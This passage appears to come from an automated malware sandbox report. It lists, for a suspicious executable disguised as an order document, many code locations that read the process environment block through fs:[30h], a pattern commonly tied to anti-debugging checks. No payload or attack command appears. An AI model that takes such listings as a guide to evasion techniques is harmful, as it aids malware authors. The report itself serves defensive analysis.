Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010423E3 mov eax, dword ptr fs:[00000030h] 5_2_010423E3
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F95210 mov eax, dword ptr fs:[00000030h] 5_2_00F95210
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F95210 mov ecx, dword ptr fs:[00000030h] 5_2_00F95210
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F95210 mov eax, dword ptr fs:[00000030h] 5_2_00F95210
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F95210 mov eax, dword ptr fs:[00000030h] 5_2_00F95210
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9AA16 mov eax, dword ptr fs:[00000030h] 5_2_00F9AA16
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9AA16 mov eax, dword ptr fs:[00000030h] 5_2_00F9AA16
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA8A0A mov eax, dword ptr fs:[00000030h] 5_2_00FA8A0A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBDBE9 mov eax, dword ptr fs:[00000030h] 5_2_00FBDBE9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105AA16 mov eax, dword ptr fs:[00000030h] 5_2_0105AA16
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105AA16 mov eax, dword ptr fs:[00000030h] 5_2_0105AA16
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC03E2 mov eax, dword ptr fs:[00000030h] 5_2_00FC03E2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051229 mov eax, dword ptr fs:[00000030h] 5_2_01051229
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC53C5 mov eax, dword ptr fs:[00000030h] 5_2_00FC53C5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105EA55 mov eax, dword ptr fs:[00000030h] 5_2_0105EA55
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4BAD mov eax, dword ptr fs:[00000030h] 5_2_00FC4BAD
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4BAD mov eax, dword ptr fs:[00000030h] 5_2_00FC4BAD
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4BAD mov eax, dword ptr fs:[00000030h] 5_2_00FC4BAD
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01024257 mov eax, dword ptr fs:[00000030h] 5_2_01024257
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBEB9A mov eax, dword ptr fs:[00000030h] 5_2_00FBEB9A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBEB9A mov eax, dword ptr fs:[00000030h] 5_2_00FBEB9A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104B260 mov eax, dword ptr fs:[00000030h] 5_2_0104B260
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104B260 mov eax, dword ptr fs:[00000030h] 5_2_0104B260
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068A62 mov eax, dword ptr fs:[00000030h] 5_2_01068A62
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2397 mov eax, dword ptr fs:[00000030h] 5_2_00FC2397
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCB390 mov eax, dword ptr fs:[00000030h] 5_2_00FCB390
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA1B8F mov eax, dword ptr fs:[00000030h] 5_2_00FA1B8F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA1B8F mov eax, dword ptr fs:[00000030h] 5_2_00FA1B8F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC138B mov eax, dword ptr fs:[00000030h] 5_2_00FC138B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC138B mov eax, dword ptr fs:[00000030h] 5_2_00FC138B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC138B mov eax, dword ptr fs:[00000030h] 5_2_00FC138B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3B7A mov eax, dword ptr fs:[00000030h] 5_2_00FC3B7A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3B7A mov eax, dword ptr fs:[00000030h] 5_2_00FC3B7A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9DB60 mov ecx, dword ptr fs:[00000030h] 5_2_00F9DB60
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9F358 mov eax, dword ptr fs:[00000030h] 5_2_00F9F358
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9DB40 mov eax, dword ptr fs:[00000030h] 5_2_00F9DB40
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF mov eax, dword ptr fs:[00000030h] 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 mov eax, dword ptr fs:[00000030h] 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01068D34 mov eax, dword ptr fs:[00000030h] 5_2_01068D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0101A537 mov eax, dword ptr fs:[00000030h] 5_2_0101A537
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105E539 mov eax, dword ptr fs:[00000030h] 5_2_0105E539
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01013540 mov eax, dword ptr fs:[00000030h] 5_2_01013540
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01043D40 mov eax, dword ptr fs:[00000030h] 5_2_01043D40
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA849B mov eax, dword ptr fs:[00000030h] 5_2_00FA849B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCAC7B mov eax, dword ptr fs:[00000030h] 5_2_00FCAC7B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 mov eax, dword ptr fs:[00000030h] 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h] 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB746D mov eax, dword ptr fs:[00000030h] 5_2_00FB746D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010605AC mov eax, dword ptr fs:[00000030h] 5_2_010605AC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010605AC mov eax, dword ptr fs:[00000030h] 5_2_010605AC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCA44B mov eax, dword ptr fs:[00000030h] 5_2_00FCA44B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h] 5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h] 5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h] 5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov ecx, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h] 5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCBC2C mov eax, dword ptr fs:[00000030h] 5_2_00FCBC2C
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h] 5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01048DF1 mov eax, dword ptr fs:[00000030h] 5_2_01048DF1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h] 5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h] 5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h] 5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h] 5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h] 5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h] 5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h] 5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h] 5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAD5E0 mov eax, dword ptr fs:[00000030h] 5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAD5E0 mov eax, dword ptr fs:[00000030h] 5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h] 5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h] 5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h] 5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102C450 mov eax, dword ptr fs:[00000030h] 5_2_0102C450
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0102C450 mov eax, dword ptr fs:[00000030h] 5_2_0102C450
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC35A1 mov eax, dword ptr fs:[00000030h] 5_2_00FC35A1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCFD9B mov eax, dword ptr fs:[00000030h] 5_2_00FCFD9B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCFD9B mov eax, dword ptr fs:[00000030h] 5_2_00FCFD9B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h] 5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h] 5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h] 5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h] 5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h] 5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h] 5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h] 5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h] 5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h] 5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBC577 mov eax, dword ptr fs:[00000030h] 5_2_00FBC577
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBC577 mov eax, dword ptr fs:[00000030h] 5_2_00FBC577
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h] 5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h] 5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h] 5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h] 5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h] 5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h] 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB7D50 mov eax, dword ptr fs:[00000030h] 5_2_00FB7D50
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FD3D43 mov eax, dword ptr fs:[00000030h] 5_2_00FD3D43
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h] 5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h] 5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h] 5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9AD30 mov eax, dword ptr fs:[00000030h] 5_2_00F9AD30
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h] 5_2_00FA3D34
